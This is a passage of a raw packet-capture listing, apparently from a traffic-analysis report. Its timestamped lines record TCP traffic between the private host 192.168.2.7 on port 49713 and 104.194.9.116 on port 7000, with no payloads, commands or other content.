                                                                                                                                                                                          Mar 28, 2024 10:25:40.827902079 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.827934980 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.827948093 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.827975988 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828017950 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828061104 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828069925 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828094006 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828119040 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828135014 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828176975 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828187943 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828207970 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828238010 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828253984 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828259945 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828288078 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828294039 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828301907 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828315020 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828334093 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828351974 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828368902 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828382969 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828389883 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828423023 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828427076 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828440905 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828454018 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828481913 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828499079 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828545094 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828567028 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828583956 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828599930 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828632116 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828644991 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828650951 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828672886 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828690052 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828716993 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828742027 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828763008 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828774929 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828804970 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828807116 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828820944 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828845978 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828849077 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828871012 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828881025 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828885078 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828903913 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.828926086 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.879316092 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951216936 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951230049 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951242924 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951261997 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951304913 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951319933 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951335907 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951339960 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951369047 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951375961 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951395988 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951431036 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951455116 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951468945 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951483011 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951500893 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951508045 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951514959 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951540947 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951546907 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951569080 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951581001 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951585054 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951621056 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951644897 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951659918 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951692104 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951718092 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951731920 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951756954 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951769114 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951771021 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951783895 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951803923 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951811075 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951849937 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951874018 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951889038 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951903105 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951927900 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951929092 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951983929 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.951986074 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.952001095 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.952033997 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.952043056 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.952049017 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.952075005 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.952089071 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.952097893 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.952125072 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.952126026 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.952141047 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.952156067 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.952176094 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.952182055 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:40.952229977 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:40.980762959 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.025604010 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.055644989 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.055663109 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.055713892 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.055718899 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.055730104 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.055768967 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.055799007 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.055874109 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.055917025 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.055924892 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.055994034 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.056036949 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.056126118 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.056207895 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.056257963 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.056276083 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.056361914 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.056405067 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.056428909 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.056529999 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.056569099 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.056639910 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.056709051 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.056747913 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.056803942 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.056886911 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.056931019 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.056965113 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.057069063 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.057116985 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.071508884 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.071563959 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.071613073 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.071629047 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.071683884 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.071721077 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.071743011 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.071890116 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.071949005 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.071979046 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.072033882 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.072072983 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.072083950 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.072122097 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.072160959 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.072185993 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.072238922 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.072308064 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.072348118 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.072470903 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.072515965 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.072534084 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.072592974 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.072627068 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.072649002 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.072699070 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.072740078 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.140145063 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.161775112 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.161839008 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.161851883 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.161910057 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.161926031 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.161947012 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.162003040 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.162040949 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.162041903 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.162108898 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.162123919 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.162142992 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.162201881 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.162241936 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.162266016 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.162345886 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.162384987 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.162400007 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.162456989 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.162491083 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.162503004 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.162549019 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.162585974 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.162640095 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.162700891 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.162735939 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.162751913 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.162805080 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.162836075 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.162854910 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.173607111 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.173652887 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.173654079 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.173671961 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.173686981 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.173700094 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.173707008 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.173733950 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.173737049 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.173762083 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.173777103 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.173794985 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.173804045 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.173835039 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.173841000 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.173866987 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.173897982 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.173923969 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.173926115 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.173940897 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.173958063 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.173990965 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.174004078 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.174021959 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.174026966 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.174057961 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.174062967 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.223086119 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.273055077 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.273075104 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.273129940 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.273139954 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.273197889 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.273224115 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.273233891 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.273303032 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.273340940 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.273341894 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.273394108 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.273436069 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.273449898 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.273509979 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.273550987 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.273570061 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.273644924 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.273685932 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.273730040 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.273833036 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.273871899 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.273880005 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.274044037 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.274081945 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.274116039 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.274171114 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.274210930 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.274220943 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.274282932 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.274321079 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.304158926 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.304231882 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.304274082 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.304302931 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.304356098 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.304388046 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.304457903 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.304524899 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.304554939 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.304589033 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.304651976 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.304687023 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.304718018 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.304832935 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.304872990 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.304898977 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.305007935 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.305054903 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.305078030 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.305167913 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.305219889 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.305242062 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.305358887 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.305398941 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.305453062 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.305553913 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:41.305592060 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:41.326086998 CET700049713104.194.9.116192.168.2.7
